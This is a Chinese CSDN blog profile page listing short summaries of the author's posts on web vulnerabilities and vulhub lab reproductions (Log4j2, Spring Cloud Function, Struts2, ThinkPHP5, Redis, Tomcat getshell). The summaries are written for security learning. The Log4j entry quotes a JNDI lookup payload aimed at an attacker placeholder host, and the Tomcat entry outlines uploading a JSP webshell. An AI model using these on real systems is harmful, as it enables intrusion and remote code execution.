YiHua_yiye
码龄4年
关注
提问 私信
  • 博客:6,249
    6,249
    总访问量
  • 14
    原创
  • 780,642
    排名
  • 230
    粉丝
  • 1
    铁粉
IP属地以运营商信息为准,境内显示到省(区、市),境外显示到国家(地区)
IP 属地:安徽省
  • 加入CSDN时间: 2021-01-21
博客简介:

weixin_54786196的博客

查看详细资料
个人成就
  • 获得21次点赞
  • 内容获得4次评论
  • 获得17次收藏
  • 代码片获得224次分享
创作历程
  • 14篇
    2023年
成就勋章
TA的专栏
  • web漏洞
    3篇
  • vulhub漏洞复现
    7篇
兴趣领域 设置
  • 网络空间安全
    网络安全
创作活动更多

如何做好一份技术文档?

无论你是技术大神还是初涉此领域的新手,都欢迎分享你的宝贵经验、独到见解与创新方法,为技术传播之路点亮明灯!

174人参与 去创作
  • 最近
  • 文章
  • 代码仓
  • 资源
  • 问答
  • 帖子
  • 视频
  • 课程
  • 关注/订阅/互动
  • 收藏
搜TA的内容
搜索 取消

SSRF漏洞原理与防御

SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)
原创
发布博客 2023.11.03 ·
218 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

Ubuntu su: 认证失败

密码中可以包含特殊字符,如!问题:我们在输入su root命令时提示su: 认证失败。解决:只要使用passwd命令重新设置下root密码。原因:报这个错误的原因是root用户默认锁定的。密码中必须包含至少一个大写字母(A-Z)。密码中必须包含至少一个小写字母(a-z)。密码中必须包含至少一个数字(0-9)。输入命令: su passwd。密码长度至少为8个字符。
原创
发布博客 2023.10.29 ·
815 阅读 ·
1 点赞 ·
0 评论 ·
0 收藏

Spring Cloud Function SpEL表达式命令注入(CVE-2022-22963)漏洞复现

Spring Cloud Function是一个用于构建和部署基于函数的微服务的框架。它使用SpEL表达式来处理函数的输入和输出。SpEL是一种强大的表达式语言,它允许开发人员在运行时动态地计算表达式。由于Spring CloudFunction中RoutingFunction类的apply方法将请求头中的"spring.cloud.function.routing-expression"参数作为Spel表达式进行处理,造成了Spel表达式注入漏洞,当使用路由功能时,攻击者可利用该漏洞远程执行任意代码。
原创
发布博客 2023.10.27 ·
413 阅读 ·
5 点赞 ·
1 评论 ·
2 收藏

CSRF原理及防护

CSRF全称为跨站请求伪造(Cross-site request forgery),是一种网络攻击方式,也被称为 one-click attack 或者 session riding。
原创
发布博客 2023.10.23 ·
347 阅读 ·
3 点赞 ·
0 评论 ·
1 收藏

Log4j2 JNDI 注入漏洞(CVE-2021-44228)漏洞复现

Apache Log4j 2 是Java语言的日志处理套件,使用极为广泛。在其2.0到2.14.1版本中存在一处JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似于`${jndi:ldap://evil.com/example}`的lookup用于进行JNDI注入,执行任意代码。Log4j是什么?JNDI又是什么?Log4j2是一个Java日志框架,用于在应用程序中记录和管理日志信息。Log4j2被广泛应用于Java项目中,帮助开发人员进行日志记录和故障排查。
原创
发布博客 2023.10.19 ·
449 阅读 ·
1 点赞 ·
0 评论 ·
0 收藏

XSS漏洞类型原理及防御方式

XSS全称是Cross Site Scripting即跨站脚本,为了与层叠样式表Cascading Style Sheets,CSS)的缩写进行区分,将跨站脚本攻击缩写为XSS,其本质是攻击者在web页面插入恶意的script代码(这个代码可以是JS脚本、CSS样式或者其他意料之外的代码),当用户浏览该页面之时,嵌入其中的script代码会被执行,从而达到恶意攻击用户的目的。
原创
发布博客 2023.10.15 ·
1064 阅读 ·
2 点赞 ·
1 评论 ·
5 收藏

GitLab 任意文件读取漏洞(CVE-2016-9086)

访问"http://192.168.233.129:8080" 访问GitLab主页 默认管理员口令"root:vulhub123456"新建项目 输入项目名称 点击 GitLab export。启动一台kali机 192.168.233.129。上传test.tar.gz文件。在vulhub靶场启动环境。
原创
发布博客 2023.10.11 ·
194 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

google hacking 常见语法

例如,allintitle:密码 用户名将返回标题中同时包含"密码"和"用户名"的页面。例如,inanchor:"点击这里"将返回链接文本中包含"点击这里"的页面。这对于查找特定链接文本的页面非常有用。例如,cache:example.com将显示example.com的Google缓存页面。例如,link:example.com将返回链接到example.com的页面。例如,intitle:"登录页面"将返回标题包含"登录页面"的页面。例如,intext:"密码"将返回包含"密码"关键词的页面。
原创
发布博客 2023.09.25 ·
292 阅读 ·
1 点赞 ·
1 评论 ·
3 收藏

弱口令及字典

是指系统登录口令的设置强度不高,容易被攻击者猜到或破解密码,从而获取非法访问权限。
原创
发布博客 2023.09.07 ·
734 阅读 ·
0 点赞 ·
1 评论 ·
4 收藏

java的序列化和反序列化

对于 JVM 可以反序列化对象,它必须是能够找到字节码的类。Java对象是运行在JVM的堆内存中的,如果JVM停止后,那么java对象的生命也就终止了。当对象被序列化时,属性 SSN 的值为 111222333,但是因为该属性是短暂的,该值没有被发送到输出流。java中的序列化时transient变量(这个关键字的作用就是告知JAVA不可以被序列化)和静态变量不会被序列化。一旦实现了此接口,就标志该类的对象就是可序列化的。该类的所有属性必须是可序列化的。Java中的序列化是指将对象转换为字节流的过程。
原创
发布博客 2023.09.04 ·
267 阅读 ·
3 点赞 ·
0 评论 ·
0 收藏

tomcat8 后台getshell漏洞复现

打开哥斯拉 生成jsp木马并保存。在url栏加上jmuma.jsp。找到刚刚jsp木马存放的位置。此时复制连接,用哥斯拉连接。将zip后缀改为war。在此位置上传war包。
原创
发布博客 2023.09.03 ·
347 阅读 ·
0 点赞 ·
0 评论 ·
1 收藏

Redis Lua沙盒绕过命令执行(CVE-2022-0543)

不同环境下的liblua库路径不同,我们需要指定一个正确的路径。而在Vulhub环境(Ubuntu fiocal)中,这个路径是。,攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸沙箱执行任意命令。Debian以及Ubuntu发行版的源在打包Redis时,不慎在Lua沙箱中遗留了一个对象。环境启动后,我们到另一台kail机连接redis。连接成功之后使用使用。
原创
发布博客 2023.09.02 ·
246 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

ThinkPHP5 5.0.23 远程代码执行漏洞复现

是由于框架对控制器名没有进行敏感字符检测,导致在没有开启强制路由的情况下可能导致远程代码执行。至此 ThinkPHP5 5.0.23 远程代码执行漏洞 复现成功。id是我们执行的命令,可更换我们需要的命令。5.0.23和5.1.31之前的所有版本。改变传参方式 GET改为POST。访问靶机ip+端口号8080。使用burp抓到首页的包。
原创
发布博客 2023.09.01 ·
513 阅读 ·
0 点赞 ·
0 评论 ·
1 收藏

vulhub struts2 s2-001漏洞复现

该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行。执行任意命令执行的是new java.lang.String[]{"pwd"}中的pwd命令,我们只需将pwd命令替换成我们想要的命令即可。可以看到环境启动成功。
原创
发布博客 2023.09.01 ·
321 阅读 ·
5 点赞 ·
0 评论 ·
0 收藏